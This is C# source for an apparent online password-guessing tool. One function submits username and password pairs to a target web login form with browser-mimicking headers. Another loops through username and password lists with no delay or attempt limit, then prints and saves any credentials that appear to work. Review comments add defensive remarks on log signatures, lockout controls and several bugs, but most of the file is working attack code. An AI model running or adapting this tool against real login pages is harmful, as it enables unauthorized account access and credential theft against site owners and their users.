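/**
 * Sends one login attempt to UserInput.fullPath and returns the response body.
 *
 * Form types handled, as selected by UserInput.formType:
 *   1 - ASP.NET form: getData() is called first; per the original author it
 *       fetches the VIEWSTATE / EVENTVALIDATION values the server expects
 *       (getData is defined outside this block).
 *   2 - generic POST form: UserInput.customFormVariables is appended to the body,
 *       but only when no VIEWSTATE value is present.
 *   3 - GET form: everything is placed in the query string.
 *   Any other value is sent as a POST carrying only the two credential fields.
 *
 * Parameters:
 *   username - value for the field named by UserInput.usernameField; sent as
 *              supplied (only the field name is URL-encoded here).
 *   password - value for the field named by UserInput.passwordField; sent as
 *              supplied.
 *
 * Returns: the full response body, which is also stored in responseStr
 * (declared outside this block).
 *
 * Side effects: in the GET branch UserInput.customFormVariables is rebuilt from
 * UserInput.rawFormVariables on every call. No exception is caught here, so
 * failures from the request or the streams propagate to the caller.
 */
public static string sendLoginRequest(string username, string password)
{
    // Every request carries the same fixed browser-style headers, plus a Referer
    // equal to the target URL. The constant header set is a stable attribute for
    // matching this traffic in web-server or proxy logs.
    const string browserUserAgent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36";
    const string browserAccept = "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3";

    // If the form type is ASP then grab the required hidden values first.
    if (UserInput.formType == 1)
    {
        getData();
    }

    if (UserInput.formType != 3)
    {
        HttpWebRequest request = (HttpWebRequest)WebRequest.Create(UserInput.fullPath);
        request.Method = "POST";

        string credentials =
            HttpUtility.UrlEncode(UserInput.usernameField, Encoding.ASCII) + "=" + username + "&" +
            HttpUtility.UrlEncode(UserInput.passwordField, Encoding.ASCII) + "=" + password;

        string postData;
        if (__VIEWSTATE.Length > 0)
        {
            // Include the VIEWSTATE properties when they were acquired.
            postData = "__VIEWSTATE=" + __VIEWSTATE + "&"
                + "__VIEWSTATEGENERATOR=" + __VIEWSTATEGENERATOR + "&"
                + "__EVENTVALIDATION=" + __EVENTVALIDATION + "&"
                + credentials;
        }
        else
        {
            postData = credentials;

            // The general form also carries the user-defined extra variables.
            if (UserInput.formType == 2)
            {
                postData += "&" + UserInput.customFormVariables;
            }
        }

        // ContentLength has to be set before the request stream is opened.
        request.ContentLength = postData.Length;
        request.UserAgent = browserUserAgent;
        request.Accept = browserAccept;
        request.ContentType = "application/x-www-form-urlencoded";
        request.Host = UserInput.host;
        request.Referer = UserInput.fullPath;

        // NOTE(review): UserInput.cookies is not attached on this path; only the
        // GET branch below adds a Cookie header.
        using (StreamWriter requestWriter = new StreamWriter(request.GetRequestStream()))
        {
            requestWriter.Write(postData);
        }

        // Dispose the response and reader even if reading fails; the original
        // left both open on this path.
        using (WebResponse response = request.GetResponse())
        using (StreamReader reader = new StreamReader(response.GetResponseStream()))
        {
            responseStr = reader.ReadToEnd();
        }
    }
    else
    {
        UserInput.customFormVariables = UserInput.buildCustomOptions(UserInput.rawFormVariables);

        // Credentials travel in the query string on this path, so each submitted
        // pair is recorded wherever request URLs are logged (server access logs,
        // intermediate proxies).
        string url = UserInput.fullPath + "?"
            + HttpUtility.UrlEncode(UserInput.usernameField, Encoding.ASCII) + "=" + username + "&"
            + HttpUtility.UrlEncode(UserInput.passwordField, Encoding.ASCII) + "=" + password + "&"
            + UserInput.customFormVariables;

        HttpWebRequest request = (HttpWebRequest)WebRequest.Create(url);
        request.UserAgent = browserUserAgent;
        request.Accept = browserAccept;

        // The original tested the cookie length twice in nested ifs; one test is enough.
        if (UserInput.cookies.Length > 0)
        {
            request.Headers.Add(HttpRequestHeader.Cookie, UserInput.cookies);
        }

        request.ContentType = "application/x-www-form-urlencoded";
        request.Host = UserInput.host;
        request.Referer = UserInput.fullPath;

        // using replaces the trailing response.Close(), which was skipped
        // whenever the read threw.
        using (WebResponse response = request.GetResponse())
        using (Stream data = response.GetResponseStream())
        using (StreamReader reader = new StreamReader(data))
        {
            responseStr = reader.ReadToEnd();
        }
    }

    return responseStr;
}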
/**
 * Runs the password-guessing loop and reports the outcome on the console.
 *
 * After loadLists(), one of two modes runs:
 *   - username list (usernames.Count greater than zero): every username is
 *     tried against the password list until a response lacks
 *     UserInput.invalidPasswordText;
 *   - single username: the username member is tried against the password list
 *     and the first hit is stored in correctUsername / correctPassword.
 *
 * A hit is inferred only from the absence of the configured failure text, so
 * any other response body (an error page, a lockout or throttling notice) is
 * recorded as a hit too; reported pairs are unverified.
 *
 * Requests are issued one after another with no delay and no attempt limit.
 * On the server side this appears as back-to-back login submissions from one
 * client; per-account lockout and per-source rate limits are the controls
 * that bound it.
 *
 * NOTE(review): in list mode one entry is appended to foundPasswords per
 * attempt, not per username, while the report pairs foundPasswords[i] with
 * usernames[i]. The indices therefore do not generally line up, and
 * usernames[i] can run past the end of the list.
 *
 * Recovered credentials are printed in cleartext and, on request, written in
 * cleartext to a path typed by the operator (File.WriteAllText replaces an
 * existing file).
 */
public static void beginAttack()
{
    const string noMatchMarker = "No Password Found";

    loadLists();

    if (usernames.Count > 0)
    {
        // List mode: every username against every password.
        foreach (string candidateUser in usernames)
        {
            foreach (string candidate in passwords)
            {
                string body = Requests.sendLoginRequest(candidateUser, candidate);
                if (!body.Contains(UserInput.invalidPasswordText))
                {
                    foundPasswords.Add(candidate);
                    passwordFound = true;
                    break;
                }

                // A placeholder is stored for each rejected attempt.
                foundPasswords.Add(noMatchMarker);

                if (showAttempts == true)
                {
                    printRejectedAttempt(candidateUser, candidate);
                }
            }
        }
    }
    else
    {
        // Single-username mode: stop at the first response without the failure text.
        foreach (string candidate in passwords)
        {
            string body = Requests.sendLoginRequest(username, candidate);
            if (!body.Contains(UserInput.invalidPasswordText))
            {
                passwordFound = true;
                correctPassword = candidate;
                correctUsername = username;
                break;
            }

            if (showAttempts == true)
            {
                printRejectedAttempt(username, candidate);
            }
        }
    }

    // Nothing matched in either mode: report and wait for a key press.
    if (passwordFound != true)
    {
        Console.ForegroundColor = ConsoleColor.Red;
        Console.WriteLine("No Matches Found");
        Console.ResetColor();
        Console.WriteLine("Press Any Key To Exit...");
        Console.ReadKey();
        return;
    }

    // Single-username result.
    if (username.Length > 0)
    {
        Console.ForegroundColor = ConsoleColor.Green;
        Console.WriteLine("Password Found!!");
        Console.WriteLine("Username: {0} Password: {1}", correctUsername, correctPassword);
        Console.ResetColor();

        string choice = UserInput.getUserResponse("If you wish to return to the menu please type \"return\":");
        if (choice == "return")
        {
            Console.ReadKey();
            UserInput.userSetup();
        }
        else
        {
            Console.WriteLine("Press Any Key To Exit...");
            Console.ReadKey();
        }
        return;
    }

    // List-mode result: print each non-placeholder entry and collect the same
    // lines for the optional file export.
    Console.WriteLine("The Following List Of Passwords Was Found...\n");
    string output = "";
    for (int i = 0; i < foundPasswords.Count; i++)
    {
        if (foundPasswords[i] != noMatchMarker)
        {
            string line = String.Format("Username: {0} Password: {1}", usernames[i], foundPasswords[i]);
            Console.WriteLine(line);
            output += line + "\n";
        }
    }

    string wantsFile = UserInput.getUserResponse("Would you like to output this list to a file? (y/n):");
    if (wantsFile == "y")
    {
        string outPath = UserInput.getUserResponse("Enter An Output Path: ");
        File.WriteAllText(outPath, output);
    }
}

// Prints one rejected attempt: the pair in the default colour, then "Incorrect" in red.
private static void printRejectedAttempt(string attemptedUser, string attemptedPassword)
{
    Console.Write("Username: {0} Password: {1} Status: ", attemptedUser, attemptedPassword);
    Console.ForegroundColor = ConsoleColor.Red;
    Console.Write("Incorrect\n");
    Console.ResetColor();
}